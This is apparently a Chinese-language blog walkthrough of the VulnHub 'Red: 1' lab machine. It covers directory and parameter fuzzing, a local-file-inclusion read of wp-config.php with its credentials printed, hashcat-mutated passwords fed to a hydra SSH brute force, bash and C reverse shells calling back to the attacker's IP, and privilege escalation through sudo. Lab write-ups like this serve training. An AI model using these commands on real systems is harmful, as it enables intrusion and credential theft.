靶场下载:Red: 1 ~ VulnHub
kali:172.88.6.144
靶场:172.88.6.70
靶场页面是这个,第一次没有找到ip,使用桥接找到了
nmap 172.88.6.0/24
访问ip
找了很久没有找到有用的信息,在查看代码的时候发现了这个,直接打不开,在本地添加host
直接打开代码没有发现什么东西,随便点击页面再查看代码,发现了一句话
翻译后发现应该是被黑了,搜索Miessler
对ip进行爆破
gobuster dir -u http://redrocks.win -t 40 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
这个速度太慢了,换一个
gobuster dir -u http://redrocks.win -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
不知道是什么原因没有扫出来,应该有什么用吧;通过进行wfuzz参数测试
wfuzz -c -u 'http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test' -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
我这个竟然没有找出来“key”
偷个懒
http://redrocks.win/NetworkFileManagerPHP.php?key=../../../../etc/passwd 可好奇,在物理机输入这个网址没有反应,在kali中输入这个网址有用
http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/read=convert.base64-encode/resource=NetworkFileManagerPHP.php
找到一些东西
PD9waHAKICAgJGZpbGUgPSAkX0dFVFsna2V5J107CiAgIGlmKGlzc2V0KCRmaWxlKSkKICAgewogICAgICAgaW5jbHVkZSgiJGZpbGUiKTsKICAgfQogICBlbHNlCiAgIHsKICAgICAgIGluY2x1ZGUoIk5ldHdvcmtGaWxlTWFuYWdlclBIUC5waHAiKTsKICAgfQogICAvKiBWR2hoZENCd1lYTnpkMjl5WkNCaGJHOXVaU0IzYjI0bmRDQm9aV3h3SUhsdmRTRWdTR0Z6YUdOaGRDQnpZWGx6SUhKMWJHVnpJR0Z5WlNCeWRXeGxjdz09ICovCj8
读取下wp-config.php的文件信息,命令:http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/read=convert.base64-encode/resource=wp-config.php,获得base64加密的wp-config.php文件进行解密,获得mysql的账户名和密码:john/R3v_m4lwh3r3_k1nG!!
PD9waHANCi8qKg0KICogVGhlIGJhc2UgY29uZmlndXJhdGlvbiBmb3IgV29yZFByZXNzDQogKg0KICogVGhlIHdwLWNvbmZpZy5waHAgY3JlYXRpb24gc2NyaXB0IHVzZXMgdGhpcyBmaWxlIGR1cmluZyB0aGUgaW5zdGFsbGF0aW9uLg0KICogWW91IGRvbid0IGhhdmUgdG8gdXNlIHRoZSB3ZWIgc2l0ZSwgeW91IGNhbiBjb3B5IHRoaXMgZmlsZSB0byAid3AtY29uZmlnLnBocCINCiAqIGFuZCBmaWxsIGluIHRoZSB2YWx1ZXMuDQogKg0KICogVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBmb2xsb3dpbmcgY29uZmlndXJhdGlvbnM6DQogKg0KICogKiBNeVNRTCBzZXR0aW5ncw0KICogKiBTZWNyZXQga2V5cw0KICogKiBEYXRhYmFzZSB0YWJsZSBwcmVmaXgNCiAqICogQUJTUEFUSA0KICoNCiAqIEBsaW5rIGh0dHBzOi8vd29yZHByZXNzLm9yZy9zdXBwb3J0L2FydGljbGUvZWRpdGluZy13cC1jb25maWctcGhwLw0KICoNCiAqIEBwYWNrYWdlIFdvcmRQcmVzcw0KICovDQovLyAqKiBNeVNRTCBzZXR0aW5ncyAtIFlvdSBjYW4gZ2V0IHRoaXMgaW5mbyBmcm9tIHlvdXIgd2ViIGhvc3QgKiogLy8NCi8qKiBUaGUgbmFtZSBvZiB0aGUgZGF0YWJhc2UgZm9yIFdvcmRQcmVzcyAqLw0KZGVmaW5lKCAnREJfTkFNRScsICd3b3JkcHJlc3MnICk7DQoNCi8qKiBNeVNRTCBkYXRhYmFzZSB1c2VybmFtZSAqLw0KZGVmaW5lKCAnREJfVVNFUicsICdqb2huJyApOw0KDQovKiogTXlTUUwgZGF0YWJhc2UgcGFzc3dvcmQgKi8NCmRlZmluZSggJ0RCX1BBU1NXT1JEJywgJ1Izdl9tNGx3aDNyM19rMW5HISEnICk7DQoNCi8qKiBNeVNRTCBob3N0bmFtZSAqLw0KZGVmaW5lKCAnREJfSE9TVCcsICdsb2NhbGhvc3QnICk7DQoNCi8qKiBEYXRhYmFzZSBDaGFyc2V0IHRvIHVzZSBpbiBjcmVhdGluZyBkYXRhYmFzZSB0YWJsZXMuICovDQpkZWZpbmUoICdEQl9DSEFSU0VUJywgJ3V0ZjgnICk7DQoNCi8qKiBUaGUgRGF0YWJhc2UgQ29sbGF0ZSB0eXBlLiBEb24ndCBjaGFuZ2UgdGhpcyBpZiBpbiBkb3VidC4gKi8NCmRlZmluZSggJ0RCX0NPTExBVEUnLCAnJyApOw0KDQpkZWZpbmUoJ0ZTX01FVEhPRCcsICdkaXJlY3QnKTsNCg0KZGVmaW5lKCdXUF9TSVRFVVJMJywgJ2h0dHA6Ly9yZWRyb2Nrcy53aW4nKTsNCmRlZmluZSgnV1BfSE9NRScsICdodHRwOi8vcmVkcm9ja3Mud2luJyk7DQoNCi8qKiNAKw0KICogQXV0aGVudGljYXRpb24gdW5pcXVlIGtleXMgYW5kIHNhbHRzLg0KICoNCiAqIENoYW5nZSB0aGVzZSB0byBkaWZmZXJlbnQgdW5pcXVlIHBocmFzZXMhIFlvdSBjYW4gZ2VuZXJhdGUgdGhlc2UgdXNpbmcNCiAqIHRoZSB7QGxpbmsgaHR0cHM6Ly9hcGkud29yZHByZXNzLm9yZy9zZWNyZXQta2V5LzEuMS9zYWx0LyBXb3JkUHJlc3Mub3JnIHNlY3JldC1rZXkgc2VydmljZX0uDQogKg0KICogWW91IGNhbiBjaGFuZ2UgdGhlc2UgYXQgYW55IHBvaW50IGluIHRpbWUgdG8gaW52YWxpZGF0ZSBhbGwgZXhpc3RpbmcgY29va2llcy4NCiAqIFRoaXMgd2lsbCBmb3JjZSBhbGwgdXNlcnMgdG8gaGF2ZSB0byBsb2cgaW4gYWdhaW4uDQogKg0KICogQHNpbmNlIDIuNi4wDQogKi8NCmRlZmluZSgnQVVUSF9LRVknLCAgICAgICAgICcydXVCdmM4U081ez5Vd1E8XjVWNVtVSEJ3JU59LUJ3V3F3fD48KkhmQndKKCAkJiUsKFpiZy9qd0ZrUkhmfnZ8Jyk7DQpkZWZpbmUoJ1NFQ1VSRV9BVVRIX0tFWScsICAnYWh9PElgNTJHTDZDXkB
BASE64编码解码
破译后是这个样子
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'john' );
/** MySQL database password */
define( 'DB_PASSWORD', 'R3v_m4lwh3r3_k1nG!!' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
define('FS_METHOD', 'direct');
define('WP_SITEURL', 'http://redrocks.win');
define('WP_HOME', 'http://redrocks.win');
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', '2uuBvc8SO5{>UwQ<^5V5[UHBw%N}-BwWqw|><*HfBwJ( $&%,(Zbg/jwFkRHf~v|');
define('SECURE_AUTH_KEY', 'ah}<I`52GL6C^@
发现数据库的账号和密码想起来查看/etc/passwd时存在一个john账户,那就使用ssh协议尝试登录以下,但是登录失败。。。。。。想了想给的提示,“That password alone won't help you! Hashcat says rules are rules”,那就需要使用hashcat进行碰撞了,因为这些源码中的信息加密方式采用的base64,因此选择base64的规则进行碰撞
hashcat --stdout pass.txt -r /usr/share/hashcat/rules/best64.rule > passlist.txt
pass.txt里面是写的是R3v_m4lwh3r3_k1nG!!
//pass.txt 为配置文件中读取的密码,passlist.txt为hash碰撞生成的密码
用这个生成的密码进行操作,但是会发现,这个操作有点问题,这个问题应该是估计设置了,只要一两分钟不操作,就会退出来,就需要新的密码
上面的图是我已经操作过,不会再退出
hydra -l john -P passlist.txt 172.88.6.70 ssh
每次退出的时候就需要生成新的密码,用这个指令就行
一般阻止退出有几种方式,第一种我没有做成功,需要反弹nc,所以再开一个页面,nc -lvnp 6688,随便写一个端口就行
bash -i >& /dev/tcp/172.88.6.144/6688 0>&1 -----
python3 -c 'import pty;pty.spawn("/bin/bash")' ----
export TERM=xterm #这里按下Ctrl+z返回一下
stty raw -echo;fg #输入reset
stty rows 46 columns 188
第二种是输入一下指令,这个也是需要反弹nc,nc -lvnp 6688
ssh john@172.88.6.70
john@172.88.6.70's password:
Last login: Sun Jun 25 14:22:01 2023 from 172.88.6.144 ----密码输入成功
cd /dev/shm
sudo -u ippsec /usr/bin/time /bin/bash
bash /dev/shm/shell.sh
cat shell.sh 输入一下指令
#!/bin/bash
bash -i >& /dev/tcp/172.88.6.144/6688 0>&1
vi shell.sh
这个时候已经反弹过去了,在nc -lvnp 6688这端
在反弹的shell中输入:python3 -c 'import pty;pty.spawn("/bin/bash")',为了维持shell的稳定,不在被踢出去,多输入两次
然后执行wget https://github.com/DominicBreuker/pspy/releases/tag/v1.2.0
如果发现不能下载,那就子安永物理机下载好,再放到靶场中,过程思路如下
1、在物理机输入https://github.com/DominicBreuker/pspy/releases/tag/v1.2.0 ,进行下载
2、box和物理机之间开个共享文件夹,思路如下:(13条消息) 设置VirtualBox共享文件夹的方法_virtualbox 共享文件夹_嵌入式李的博客-CSDN博客
3、启动Apache服务可以通过以下命令:
- 打开终端 2. 输入命令:
sudo service apache2 start
4、在找这个路径:/var/www/html/,将文件放进去
5、编写supersecretfileuc.c,https://www.revshells.com/ 选择C语言,
并打开终端输入:gcc supersecretfileuc.c -o dev ,需要注意的是supersecretfileuc.c是反弹shell的源码,dev为编译之后的程序
这个时候要再删除两个文件,分别是dev和supersecretfileuc.c文件,然后将c语言用的反弹shell脚本重命名相同的名称,替换到.git目录中,等待反弹shell
wget 172.88.6.144/dev
wget 172.88.6.144/supersecretfileuc.c
这个时候让程序跑,再开一个端口 nc -lvnp 6666 ,等两分钟后就会连接上
这个靶场对于我来说是有点难度的,里面还有好多细节没有清楚,截图也没有搞(不是我不想搞,是被吃掉了)
总计一下吧
1.hashcat、gobuster、wfuzz、hydra,还有好多
2、勤加练习,以后再继续打这个靶场